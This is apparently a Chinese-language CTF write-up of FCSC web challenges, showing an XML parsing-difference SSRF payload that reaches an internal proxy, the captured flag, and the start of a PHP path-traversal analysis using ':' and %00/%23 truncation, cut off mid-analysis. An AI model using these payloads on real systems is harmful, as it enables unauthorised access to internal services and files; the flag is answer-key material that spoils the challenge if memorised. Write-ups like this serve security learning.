flag ~~这个Debug模式好帅啊，符合我对pwn的固有印象~~

Bubulle Corp (Part 1/2)#

考察XML解析差异。需要SSRF到internal-proxy，访问http://bubulle-corp-internal-proxy/aaa，任意非根路径都能代理到打印flag.txt

存储xml时，有https要求，那么是无法SSRF到proxy的。

1
if request.method == "POST":
2
        xml_data = request.form["settings"]
3

4
        try:
5
            root = ET.fromstring(xml_data.encode())
6
        except ET.XMLSyntaxError:
7
            return render_template("settings.html", user=user, error="Invalid XML")
8

9
        if root.tag != "settings":
10
            return render_template("settings.html", user=user, error="Root element must be <settings>")
11

12
        child_tags = [elem.tag for elem in root]
13
        if "icon_url" not in child_tags:
14
            return render_template("settings.html", user=user, error="Missing <icon_url>")
15
        if "method" not in child_tags:
16
            return render_template("settings.html", user=user, error="Missing <method>")
17

18
        for elem in list(root):
19
            if elem.tag == "icon_url" and (not elem.text or not elem.text.startswith("https://")):
20
                return render_template("settings.html", user=user, error="Icon URL must start with https://")
21

22
            if elem.tag == "method" and elem.text not in ("GET", "POST"):
23
                return render_template("settings.html", user=user, error="Method must be GET or POST")
24

25
            if elem.tag not in ("icon_url", "method", "body"):
26
                root.remove(elem)
27

28
        clean = ET.tostring(root, encoding="unicode")
29
        db.execute("UPDATE users SET settings = ? WHERE id = ?", (clean, session["user_id"]))
30
        db.commit()
31
        return redirect("/settings")

不过fetch头像处，并没有严格限制节点位置，而是使用find来查找.//icon_url，导致存在多个相同节点时，会取第一个。

1
    root = ET.fromstring(settings_xml.encode())
2

3
    icon_url = root.find(".//icon_url").text
4
    method = root.find(".//method").text
5
    body = root.find(".//body").text if root.find(".//body") else None

构造以下payload：

1
<settings>
2
    <body>
3
        <icon_url>http://bubulle-corp-internal-proxy/aaa</icon_url>
4
    </body>
5
    <icon_url>https://baidu.com</icon_url>
6
    <method>GET</method>
7
</settings>

下载头像icon获得flag：

1
FCSC{c22f014ba1aac9b3c487989156c470b0}

Shellfish Say#

Finally the new version of Shrimp Say is out! Discover Shellfish Say! To ask the bot to say something, simply log in with: nc challenges.fcsc.fr 2256. Note: The VM of the event does not have access to the Internet.

请求nc会响应：

1
==========
2
Tips: There is a small race window (~10ms) when a new tab is opened where console.log won't return output :(
3
Note that your exploit must target http://shellfish-say/ to get the flag.
4
==========

有点没太看懂。

app/html/get_quote.php

1
<?php
2
$quote_file = "/tmp/quotes/";
3
if(isset($_GET["quote"])) {
4
    if(strpos($_GET["quote"],":")) {
5
        $quote_file .= parse_url($_GET["quote"].".txt")["path"];
6
    } else {
7
        if(strpos($_GET["quote"], "..")) {
8
            $quote_file .= "shellfish.txt";
9
        } else {
10
            $quote_file .= $_GET["quote"].".txt";
11
        }
12
    }
13
} else {
14
    $quote_file .= "shellfish.txt";
15
}
16
if(!file_exists($quote_file)) {
17
    $quote_file = "/tmp/quotes/shellfish.txt";
18
}
19
readfile($quote_file);

哦还有个.htaccess的重写规则:

1
RewriteEngine On
2
RewriteCond %{REQUEST_FILENAME}.php -f
3
RewriteRule ^(.+)$ $1.php [L]

先来分析get_quote.php，这里应该能任意文件读取。

quote_file前缀限制死了，需要用..来路径穿越。注意到..的防御在if(strpos($_GET["quote"],":"))的else里，所以只需让quote参数包含:即可。走parse_url也就意味着拼接.txt可以用%00或者%23来截断。